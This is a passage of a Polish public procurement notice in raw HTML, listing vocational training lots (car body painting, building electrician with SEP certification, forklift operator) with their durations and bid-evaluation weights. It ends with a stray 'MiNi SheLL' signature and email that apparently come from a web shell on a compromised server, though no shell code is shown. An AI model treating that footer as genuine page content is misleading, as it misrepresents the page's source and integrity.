2. Zagadnienia teoretyczne i umiejętności praktyczne (w tym ćwiczenia) związane z zawodem blacharza-lakiernika samochodowego, z wykorzystaniem nowoczesnych technologii, w tym m.in.:
- demontaż i montaż elementów nadwozia,
- zamocowanie nadwozia na ramie stanowiska do naprawy powypadkowej nadwozi,
- pomiar charakterystycznych punktów nadwozia,
- pomiar lepkości wyrobów lakierowych,
- materiały lakierowe, sposoby przechowywania i transportu,
- mieszanie, rozcieńczanie i zagęszczanie wyrobów lakierowych,
- wstępna ocena stanu powierzchni i wybór metody naprawy,
- przygotowanie, obsługa, czyszczenie i konserwacja pistoletów do natrysku pneumatycznego,
- przygotowanie powierzchni metodą mechaniczną,
- przygotowanie powierzchni metodami ręcznymi,
- przygotowanie i obsługa kabino-suszarki lakierniczej,
- przygotowanie, obsługa, czyszczenie i konserwacja pozostałych urządzeń do natrysku pneumatycznego,
- przygotowanie powierzchni metodą szlifowania,
- przygotowanie powierzchni metodą płomieniową,
- przygotowanie powierzchni metodą oczyszczania strumieniowo-ściernego.
Łącznie zagadnienia te powinny obejmować 100 godzin.
3. Zajęcia praktyczne w wybranych zakładach usługowych blacharstwa i lakiernictwa samochodowego, punktach serwisowych lub stacjach obsługi pojazdów samochodowych - 180 godzin.
Należy zapewnić optymalną ilość nowoczesnego i sprawnego sprzętu oraz maszyn, dostosowaną do liczby uczestników szkolenia, a także zapewnić niezbędną odzież ochronną. Należy zapewnić kadrę dydaktyczną w zakresie instruktorów do zajęć praktycznych..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40.0</li>
<li>2. Zakres i jakość programu szkolenia - 20.0</li>
<li>3. Kwalifikacje kadry dydaktycznej - 15.0</li>
<li>4. Baza lokalowa, jej wyposażenie, sprzęt i materiały dydaktyczne - 15.0</li>
<li>5. Akredytacja kuratora oświaty na objęty zamówieniem kierunek szkolenia - 10.0</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> KURS ELEKTRYKA BUDOWLANEGO Z UPRAWNIENIAMI ELEKTROENERGETYCZNYMI DO 1 KV (UPRAWNIENIA SEP).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem kursu jest teoretyczne i praktyczne przygotowanie uczestników szkolenia do wykonywania zawodu elektryka budowlanego oraz uzyskanie obowiązujących uprawnień elektroenergetycznych do 1 kV (uprawnienia SEP).   
Program szkolenia powinien obejmować:
1) przepisy bezpieczeństwa i higieny pracy oraz przepisy przeciwpożarowe;
2) zagadnienia teoretyczne i umiejętności praktyczne (w tym ćwiczenia) związane z zawodem elektryka budowlanego, z wykorzystaniem nowoczesnych technologii - w łącznej liczbie 100 godzin; 
3) zajęcia praktyczne na stanowisku pracy w zawodzie elektryka budowlanego - 150 godzin.
Szkolenie powinno obejmować przeprowadzenie egzaminu przed komisją kwalifikacyjną w zakresie zdobycia obowiązujących uprawnień elektroenergetycznych do 1 kV, umożliwiających wykonywanie zawodu elektryka  
budowlanego. Koszt uzyskania świadectwa kwalifikacyjnego powinien być wliczony do kalkulacji  kosztów szkolenia. Należy zapewnić optymalną ilość nowoczesnego i sprawnego sprzętu oraz maszyn, dostosowaną do liczby uczestników szkolenia, a także zapewnić niezbędną odzież ochronną. Należy zapewnić kadrę dydaktyczną w zakresie instruktorów do zajęć praktycznych. Miejsce odbywania zajęć praktycznych oraz kadra dydaktyczna powinny gwarantować solidne przygotowanie uczestników szkolenia do wykonywania zawodu objętego szkoleniem. Należy zaplanować częściowe przeprowadzenie zajęć praktycznych w ramach poligonu szkoleniowego pod bieżącym nadzorem i opieką instruktorów..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40.0</li>
<li>2. Zakres i jakość programu szkolenia - 20.0</li>
<li>3. Kwalifikacje kadry dydaktycznej - 15.0</li>
<li>4. Baza lokalowa, jej wyposażenie, sprzęt i materiały dydaktyczne - 15.0</li>
<li>5. Akredytacja kuratora oświaty na objęty zamówieniem kierunek szkolenia - 10.0</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> KURS KIEROWCY OPERATORA WÓZKÓW JEZDNIOWYCH Z NAPĘDEM SILNIKOWYM.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem kursu jest przygotowanie uczestników szkolenia do samodzielnej obsługi wózków jezdniowych w transporcie wewnątrzzakładowym i zdobycia w ramach egzaminu obowiązujących uprawnień wydawanych przez Urząd Dozoru Technicznego w zakresie objętym szkoleniem, zgodnie z Rozporządzeniem Ministra  
Gospodarki z dnia 10 maja 2002 r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym (Dz. U. z 2002 r. Nr 70, poz. 650 z późn. zm.). Program szkolenia powinien być zatwierdzony lub opracowany przez Ośrodek Doskonalenia Kadr w Mysłowicach nadzorowany przez Ministra Gospodarki i dodatkowo obejmować przeszkolenie w zakresie bezpiecznego użytkowania butli z gazem, w tym ich bezpiecznej wymiany w obsługiwanych wózkach jezdniowych. Szkolenie powinno zakończyć się egzaminem na uzyskanie świadectwa kwalifikacyjnego z zakresu obsługi wózka jezdniowego przeprowadzonym przez Urząd Dozoru Technicznego. Miejsce odbywania zajęć praktycznych oraz stan i ilość maszyn (wózków) do realizacji zajęć praktycznych powinny gwarantować solidne przygotowanie uczestników do wykonywania zawodu objętego szkoleniem. Należy zapewnić minimum cztery wózki jezdniowe.
Szkolenie powinno być przeprowadzone przez instytucję szkoleniową oraz wykładowców, instruktorów posiadających obowiązujące uprawnienia krajowe do prowadzenia tego rodzaju szkolenia. Do oferty należy dołączyć certyfikat lub inny dokument uprawniający instytucję szkoleniową i wykładowców, instruktorów do prowadzenia szkolenia wydany przez Ośrodek Doskonalenia Kadr Ministerstwa Gospodarki i Pracy w Mysłowicach..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40.0</li>
<li>2. Zakres i jakość programu szkolenia - 20.0</li>
<li>3. Kwalifikacje kadry dydaktycznej - 15.0</li>
<li>4. Baza lokalowa, jej wyposażenie, sprzęt i materiały dydaktyczne - 15.0</li>
<li>5. Akredytacja kuratora oświaty na objęty zamówieniem kierunek szkolenia - 10.0</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com